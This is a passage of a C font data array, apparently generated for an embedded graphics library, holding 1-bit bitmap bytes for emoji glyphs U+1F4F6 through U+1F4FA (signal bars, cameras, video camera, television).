0xf, 0xff, 0xff, 0xf9, 0xc0, 0x70, 0x3, 0xc0,
0x7, 0xf8, 0x3, 0xfc, 0x70, 0x78, 0x0, 0xe0,
0x3, 0xfc, 0x1, 0xfe, 0x1c, 0x38, 0x0, 0x38,
0x1, 0xff, 0xff, 0xff, 0x7, 0x38, 0x0, 0xe,
0x0, 0xff, 0xff, 0xff, 0x81, 0xf8, 0x0, 0x7,
0x80, 0x3f, 0xff, 0xff, 0x80, 0x78, 0x0, 0x1,
0xe0, 0x1, 0xff, 0xfc, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0xf, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F4F6 "📶" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x81, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xe0, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x3,
0xf0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x1,
0xf8, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80,
0xfc, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x7e, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
0x3f, 0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x1f, 0x81, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0xf, 0xc0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x7, 0xe0, 0x7f, 0xff, 0xff, 0xff, 0xe0, 0x7e,
0x3, 0xf0, 0x3f, 0xff, 0xff, 0xff, 0xf0, 0x3f,
0x1, 0xf8, 0x1f, 0xff, 0xff, 0xff, 0xf8, 0x1f,
0x80, 0xfc, 0xf, 0xff, 0xff, 0xff, 0xfc, 0xf,
0xc0, 0x7e, 0x7, 0xff, 0xff, 0xff, 0xfe, 0x7,
0xe0, 0x3f, 0x3, 0xff, 0xff, 0xff, 0xff, 0x3,
0xf0, 0x1f, 0x81, 0xff, 0xff, 0xff, 0xff, 0x81,
0xf8, 0xf, 0xc0, 0xff, 0xff, 0xff, 0xff, 0xc0,
0xfc, 0x7, 0xe0, 0x7f, 0xff, 0xff, 0xff, 0xe0,
0x7e, 0x3, 0xf0, 0x3f, 0xff, 0xff, 0x3, 0xf0,
0x3f, 0x1, 0xf8, 0x1f, 0xff, 0xff, 0x81, 0xf8,
0x1f, 0x80, 0xfc, 0xf, 0xff, 0xff, 0xc0, 0xfc,
0xf, 0xc0, 0x7e, 0x7, 0xff, 0xff, 0xe0, 0x7e,
0x7, 0xe0, 0x3f, 0x3, 0xff, 0xff, 0xf0, 0x3f,
0x3, 0xf0, 0x1f, 0x81, 0xff, 0xff, 0xf8, 0x1f,
0x81, 0xf8, 0xf, 0xc0, 0xff, 0xff, 0xfc, 0xf,
0xc0, 0xfc, 0x7, 0xe0, 0x7f, 0xff, 0xfe, 0x7,
0xe0, 0x7e, 0x3, 0xf0, 0x3f, 0xff, 0xff, 0x3,
0xf0, 0x3f, 0x1, 0xf8, 0x1f, 0xff, 0xff, 0x81,
0xf8, 0x1f, 0x80, 0xfc, 0xf, 0xff, 0xff, 0xc0,
0xfc, 0xf, 0xc0, 0x7e, 0x7, 0xff, 0xff, 0xe0,
0x7e, 0x7, 0xe0, 0x3f, 0x3, 0xff, 0xff, 0xf0,
0x3f, 0x3, 0xf0, 0x1f, 0x81, 0xff, 0xff, 0xf8,
0x1f, 0x81, 0xf8, 0xf, 0xc0, 0xff, 0xff, 0xfc,
0xf, 0xc0, 0xfc, 0x7, 0xe0, 0x7f, 0xff, 0xfe,
0x7, 0xe0, 0x7e, 0x3, 0xf0, 0x3f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfd,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0,
/* U+1F4F7 "📷" */
0x0, 0xff, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf8, 0x7f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x70, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x3, 0xfc,
0x3, 0xfe, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x7,
0xfc, 0x7, 0xff, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x7, 0xfc, 0x7, 0xff, 0x7, 0xe0, 0x0, 0x0,
0x0, 0x7, 0xfc, 0x7, 0xff, 0x7, 0xe0, 0x0,
0x0, 0x0, 0x7, 0xfc, 0x7, 0xff, 0x7, 0xe0,
0x0, 0x0, 0x0, 0x3, 0xfc, 0x7, 0xff, 0x7,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xfe,
0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x40,
0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x1f,
0xfe, 0x0, 0x0, 0x7, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0,
0x0, 0x3, 0xf8, 0x3, 0xf8, 0x0, 0x7, 0xe0,
0x0, 0x0, 0x7, 0xe0, 0x0, 0xfc, 0x0, 0x7,
0xe0, 0x0, 0x0, 0xf, 0x80, 0x0, 0x3e, 0x0,
0x7, 0xe0, 0x0, 0x0, 0x1f, 0x0, 0x0, 0x1f,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x3e, 0x0, 0x40,
0xf, 0x80, 0x7, 0xe0, 0x0, 0x0, 0x7c, 0x7,
0xfc, 0x7, 0x80, 0x7, 0xe0, 0x0, 0x0, 0x78,
0x1f, 0xff, 0x3, 0xc0, 0x7, 0xe0, 0x0, 0x0,
0xf8, 0x3f, 0xff, 0x83, 0xc0, 0x7, 0xe0, 0x0,
0x0, 0xf0, 0x7f, 0xff, 0xc1, 0xe0, 0x7, 0xe0,
0x0, 0x0, 0xf0, 0x7f, 0xff, 0xc1, 0xe0, 0x7,
0xe0, 0x0, 0x1, 0xe0, 0xff, 0xff, 0xe0, 0xf0,
0x7, 0xe0, 0x0, 0x1, 0xe0, 0xff, 0xff, 0xe0,
0xf0, 0x7, 0xe0, 0x0, 0x1, 0xe1, 0xff, 0xff,
0xf0, 0xf0, 0x7, 0xe0, 0x0, 0x1, 0xe1, 0xff,
0xff, 0xf0, 0xf0, 0x7, 0xe0, 0x0, 0x1, 0xe1,
0xff, 0xff, 0xf0, 0xf0, 0x7, 0xe0, 0x0, 0x1,
0xc1, 0xff, 0xff, 0xf0, 0xf0, 0x7, 0xe0, 0x0,
0x1, 0xe1, 0xff, 0xff, 0xf0, 0xf0, 0x7, 0xe0,
0x0, 0x1, 0xe1, 0xff, 0xff, 0xf0, 0xf0, 0x7,
0xe0, 0x0, 0x1, 0xe1, 0xff, 0xff, 0xf0, 0xf0,
0x7, 0xe0, 0x0, 0x1, 0xe0, 0xff, 0xff, 0xe0,
0xf0, 0x7, 0xe0, 0x0, 0x1, 0xe0, 0xff, 0xff,
0xe0, 0xf0, 0x7, 0xe0, 0x0, 0x1, 0xf0, 0x7f,
0xff, 0xc1, 0xe0, 0x7, 0xe0, 0x0, 0x0, 0xf0,
0x3f, 0xff, 0x81, 0xe0, 0x7, 0xe0, 0x0, 0x0,
0xf8, 0x1f, 0xff, 0x83, 0xe0, 0x7, 0xe0, 0x0,
0x0, 0x78, 0xf, 0xfe, 0x7, 0xc0, 0x7, 0xe0,
0x0, 0x0, 0x7c, 0x3, 0xf8, 0x7, 0xc0, 0x7,
0xe0, 0x0, 0x0, 0x3e, 0x0, 0x0, 0xf, 0x80,
0x7, 0xff, 0xff, 0xff, 0xff, 0x0, 0x0, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x0,
0x7f, 0xff, 0xff, 0xe0, 0x0, 0x0, 0xf, 0xe0,
0x1, 0xfe, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x7,
0xfe, 0xf, 0xfc, 0x0, 0x7, 0xe0, 0x0, 0x0,
0x1, 0xff, 0xff, 0xf0, 0x0, 0x7, 0xe0, 0x0,
0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x7, 0xf0,
0x0, 0x0, 0x0, 0x3f, 0xff, 0x80, 0x0, 0xf,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfe, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfc, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf8,
/* U+1F4F8 "📸" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x60, 0x0, 0x1, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x30, 0x0, 0x1,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0,
0x3, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c,
0x0, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1f, 0x0, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1f, 0x80, 0xf, 0x0, 0x0, 0x0, 0x0,
0xff, 0xfc, 0x1f, 0xc0, 0x1f, 0x0, 0x0, 0x0,
0x0, 0xff, 0xfc, 0xf, 0xf0, 0x3f, 0x0, 0x0,
0x30, 0x0, 0xff, 0xfc, 0xe, 0x78, 0x3b, 0x0,
0x3, 0xe0, 0x0, 0xff, 0xfc, 0xe, 0x3c, 0x73,
0x0, 0x3f, 0xc0, 0x1f, 0xff, 0xff, 0xff, 0x1e,
0xe3, 0xff, 0xff, 0xf8, 0x7f, 0xff, 0xff, 0xff,
0x7, 0xe3, 0xff, 0xff, 0xfc, 0x70, 0x0, 0x0,
0x7, 0x3, 0xc3, 0xff, 0x3c, 0xe, 0xe0, 0x0,
0x0, 0x3, 0x80, 0x83, 0xf0, 0x78, 0x7, 0xe0,
0x0, 0x0, 0x3, 0x80, 0x2, 0x0, 0xf0, 0x7,
0xe0, 0x0, 0x0, 0x1, 0x80, 0x0, 0x1, 0xfe,
0x7, 0xe0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x7,
0xff, 0x7, 0xe0, 0x0, 0x0, 0x3, 0xc0, 0x0,
0xf, 0xff, 0x7, 0xe0, 0x0, 0x0, 0xf, 0xc0,
0x0, 0x1f, 0xff, 0x7, 0xe0, 0x0, 0x0, 0x1f,
0x0, 0x0, 0x3f, 0xff, 0x7, 0xe0, 0x0, 0x0,
0x7c, 0x0, 0x0, 0x7f, 0xff, 0x7, 0xe0, 0x0,
0x1, 0xf0, 0x0, 0x0, 0x73, 0xfe, 0x7, 0xe0,
0x0, 0x7, 0xc0, 0x0, 0x0, 0x30, 0x0, 0x7,
0xe0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x38, 0x0,
0x7, 0xe0, 0x0, 0x7f, 0xff, 0xf8, 0x0, 0x18,
0x0, 0x7, 0xe0, 0x1, 0xff, 0xff, 0xf8, 0x1c,
0x1c, 0x0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x3f, 0xcf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf8, 0x3f, 0xff, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x3, 0xf8, 0x73, 0xfe, 0x0, 0x7, 0xe0, 0x0,
0x0, 0xf, 0xf8, 0x60, 0x7f, 0x0, 0x7, 0xe0,
0x0, 0x0, 0x1f, 0x98, 0xe0, 0x3f, 0x0, 0x7,
0xe0, 0x0, 0x0, 0x1f, 0x1c, 0xc0, 0x1f, 0x0,
0x7, 0xe0, 0x0, 0x0, 0x3e, 0x1d, 0xf0, 0xf,
0x80, 0x7, 0xe0, 0x0, 0x0, 0x7c, 0x1f, 0xfe,
0x7, 0x80, 0x7, 0xe0, 0x0, 0x0, 0x78, 0x1f,
0xff, 0x3, 0xc0, 0x7, 0xe0, 0x0, 0x0, 0xf8,
0x3f, 0xff, 0x81, 0xe0, 0x7, 0xe0, 0x0, 0x0,
0xf0, 0x7f, 0xff, 0xc1, 0xe0, 0x7, 0xe0, 0x0,
0x1, 0xf0, 0xff, 0xff, 0xe1, 0xe0, 0x7, 0xe0,
0x0, 0x1, 0xe0, 0xff, 0xff, 0xe0, 0xf0, 0x7,
0xe0, 0x0, 0x1, 0xe1, 0xff, 0xff, 0xf0, 0xf0,
0x7, 0xe0, 0x0, 0x1, 0xe1, 0xff, 0xff, 0xf0,
0xf0, 0x7, 0xe0, 0x0, 0x1, 0xe1, 0xff, 0xff,
0xf0, 0xf0, 0x7, 0xe0, 0x0, 0x1, 0xc1, 0xff,
0xff, 0xf0, 0xf0, 0x7, 0xe0, 0x0, 0x1, 0xc1,
0xff, 0xff, 0xf0, 0xf0, 0x7, 0xe0, 0x0, 0x1,
0xe1, 0xff, 0xff, 0xf0, 0xf0, 0x7, 0xe0, 0x0,
0x1, 0xe1, 0xff, 0xff, 0xf0, 0xf0, 0x7, 0xe0,
0x0, 0x1, 0xe0, 0xff, 0xff, 0xe0, 0xf0, 0x7,
0xe0, 0x0, 0x1, 0xe0, 0xff, 0xff, 0xe0, 0xf0,
0x7, 0xe0, 0x0, 0x1, 0xf0, 0x7f, 0xff, 0xc1,
0xe0, 0x7, 0xe0, 0x0, 0x0, 0xf0, 0x7f, 0xff,
0xc1, 0xe0, 0x7, 0xe0, 0x0, 0x0, 0xf8, 0x3f,
0xff, 0x83, 0xe0, 0x7, 0xe0, 0x0, 0x0, 0x78,
0x1f, 0xff, 0x3, 0xc0, 0x7, 0xe0, 0x0, 0x0,
0x7c, 0x7, 0xfc, 0x7, 0xc0, 0x7, 0xe0, 0x0,
0x0, 0x3e, 0x0, 0x0, 0xf, 0x80, 0x7, 0xff,
0xff, 0xff, 0xff, 0x0, 0x0, 0x1f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0x80, 0x0, 0x3f, 0xff,
0xff, 0xe0, 0x0, 0x0, 0xf, 0xe0, 0x0, 0xfe,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x7, 0xfc, 0x7,
0xfc, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x1, 0xff,
0xff, 0xf0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0xff, 0xff, 0xe0, 0x0, 0x7, 0xf0, 0x0, 0x0,
0x0, 0x3f, 0xff, 0x80, 0x0, 0xf, 0x7f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf8,
/* U+1F4F9 "📹" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x20, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x78, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x78, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x38, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xf8, 0x70, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xf8, 0x60, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1e, 0x70, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x70, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xc0, 0x71,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x0,
0xef, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c,
0x0, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf0, 0x3, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x80, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1e, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x78, 0x0, 0xf3, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x1, 0xe0, 0x7, 0x8f, 0xbe, 0x0,
0x0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x0, 0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0x0, 0x0, 0x7f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xf, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x3f, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x70, 0x1c, 0x70,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x30,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3b, 0x80,
0x61, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x77,
0x0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xee, 0x1, 0x80, 0x0, 0xff, 0xff, 0xff, 0xfc,
0x1, 0xdc, 0x7, 0x0, 0x7, 0xff, 0xff, 0xff,
0xfe, 0x1, 0xb8, 0xe, 0x0, 0x1e, 0x0, 0x0,
0x0, 0x1c, 0x3, 0xf0, 0x18, 0x0, 0x38, 0x0,
0x0, 0x0, 0x1c, 0x7, 0xe0, 0x30, 0x0, 0x70,
0x0, 0x0, 0x0, 0x38, 0xf, 0xc0, 0x60, 0x0,
0xe0, 0x0, 0x0, 0x0, 0x70, 0x1f, 0x80, 0xc0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0xe0, 0x3f, 0x1,
0x80, 0x3, 0x80, 0x0, 0x0, 0x1, 0xc0, 0x7e,
0x3, 0x1, 0xff, 0x0, 0x0, 0x0, 0x3, 0x80,
0xfc, 0x6, 0x3, 0xfe, 0x0, 0x0, 0x0, 0x7,
0x1, 0xf8, 0xc, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe, 0x3, 0xf0, 0x18, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0xe0, 0x30, 0x0, 0x0, 0x0,
0x0, 0x0, 0x38, 0xf, 0xc0, 0x60, 0x0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x1f, 0x80, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x3f, 0x1, 0x80,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x76, 0x3,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0xee,
0x6, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x1,
0xdc, 0xc, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe,
0x3, 0xb8, 0x18, 0xf, 0xf8, 0x0, 0x0, 0x0,
0x1c, 0x7, 0x7f, 0xf0, 0x1f, 0xf0, 0x0, 0x0,
0x0, 0x38, 0xe, 0x7f, 0xe0, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x70, 0x1c, 0x0, 0xc0, 0x1, 0xc0,
0x0, 0x0, 0x0, 0xe0, 0x38, 0x1, 0x80, 0x3,
0x80, 0x0, 0x0, 0x1, 0xc0, 0x70, 0x3, 0x0,
0x7, 0x0, 0x0, 0x0, 0x3, 0x80, 0xe0, 0x3,
0x0, 0xe, 0x0, 0x0, 0x0, 0x7, 0x1, 0x80,
0x6, 0x0, 0xe, 0x0, 0x0, 0x0, 0xc, 0x7,
0x0, 0xc, 0x0, 0x1f, 0xff, 0xff, 0xff, 0xf8,
0xe, 0x0, 0x18, 0x0, 0xf, 0xff, 0xff, 0xff,
0xc0, 0x1c, 0x0, 0x30, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x38, 0x0, 0x60, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x0, 0x60, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xc0, 0x0, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x1, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x1,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x0,
0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x0, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc0,
/* U+1F4FA "📺" */
0x0, 0x0, 0x3, 0x0, 0x0, 0x0, 0x80, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0x3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0xe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x0,
0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x0,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf,
0x0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe, 0x0, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x0, 0x70, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x1, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x7, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xff, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f,
0xff, 0xff, 0xc0, 0x0, 0x0, 0x1f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x7f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfd, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3f, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xf8, 0x0, 0xff, 0xff, 0xff,
0xff, 0x80, 0x0, 0x3, 0xf0, 0xf, 0xff, 0xff,
0xff, 0xff, 0xc0, 0xe, 0x7, 0xe0, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xe0, 0x36, 0xf, 0xc0, 0xff,
0xf8, 0x7f, 0xff, 0xff, 0xe0, 0xee, 0x1f, 0x81,
0xff, 0x0, 0xff, 0xff, 0xff, 0xc1, 0x9c, 0x3f,
0x7, 0xf8, 0x1, 0xff, 0xff, 0xff, 0xc3, 0xb8,
0x7e, 0xf, 0xe0, 0x7f, 0xff, 0xff, 0xff, 0x83,
0x60, 0xfc, 0x1f, 0xc7, 0xff, 0xff, 0xff, 0xff,
0x3, 0x81, 0xf8, 0x7f, 0xff, 0xff, 0xff, 0xff,
0xfe, 0x0, 0x3, 0xf0, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfe, 0x0, 0x7, 0xe1, 0xf7, 0xff, 0xff,
0xff, 0xff, 0xfc, 0x0, 0xf, 0xc3, 0xc7, 0xff,
0xff, 0xff, 0xff, 0xf8, 0x38, 0x1f, 0x87, 0x8f,
0xff, 0xff, 0xff, 0xff, 0xf0, 0xf8, 0x3f, 0xf,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xe3, 0x38, 0x7e,
0x1e, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xc6, 0x30,
0xfc, 0x3c, 0xff, 0xff, 0xff, 0xff, 0xff, 0x8e,
0x61, 0xf8, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xe, 0x83, 0xf0, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfe, 0xe, 0x7, 0xe1, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfc, 0x0, 0xf, 0xc3, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf8, 0x0, 0x1f, 0x87, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf0, 0x0, 0x3f, 0xf, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe0, 0x0, 0x7e, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xc3, 0xe0, 0xfc,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x8f, 0xe1,
0xf8, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x1f,
0xc3, 0xf0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x3f, 0x87, 0xe1, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfc, 0x7f, 0xf, 0xc1, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf0, 0xfe, 0x1f, 0x83, 0xff, 0xff, 0xff,
0xff, 0xff, 0xe1, 0xfc, 0x3f, 0x7, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc3, 0xf8, 0x7e, 0xf, 0xff,
0xff, 0xff, 0xff, 0xff, 0x87, 0xf0, 0xfc, 0xf,
0xff, 0xff, 0xff, 0xff, 0xfe, 0xf, 0xe1, 0xf8,
0xf, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x1f, 0xc3,
